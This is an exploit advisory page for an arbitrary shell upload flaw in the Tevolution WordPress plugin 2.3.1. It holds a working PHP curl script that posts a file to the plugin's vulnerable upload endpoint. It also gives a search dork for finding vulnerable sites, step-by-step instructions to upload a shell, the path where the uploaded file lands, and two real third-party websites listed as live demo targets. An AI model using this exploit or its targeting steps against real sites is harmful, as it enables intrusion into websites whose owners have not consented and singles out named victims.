Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability

2016.08.16
mr xBADGIRL21 (MR) mr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector # Vendor Homepage : https://templatic.com/ # version : 2.3.1 # Tested on: [ BackBox ] # skype:xbadgirl21 # Date: 15/08/2016 # video Proof : https://youtu.be/eVjW6rnaoSY ###################### # [+] DESCRIPTION : ###################### # [+] The Tevolution WordPress plugin enables advanced functionality in our themes. # [+] Some of the features it enables include custom post types, monetization options, custom fields… # [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory ###################### # [+] USAGE : ###################### # 1.- Download or Copy the Exploit C0des # 2.- Use Dork and Choose One Of the Website # 3.- Edit The Script # 4.- Upload Your File : shell.php.jpg or shell.php.txt ###################### # [+] Exploit: ###################### <?php $uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean you are the Founder or Owner of this ^_^ $ch = curl_init("http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ###################### # [+] Dev!l Path : ###################### # http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt ###################### # [+] Live Demo : ###################### # http://guiagronicaragua.com # http://eventsinsuriname.com ###################### # Discovered by : xBADGIRL21 - Unkn0wN # Greetz : All Mauritanien Hackers - NoWhere ####################### ### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't Want me to Write His Name # so I Just Write the Exploit C0des ........... #######################

References:

https://youtu.be/eVjW6rnaoSY


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top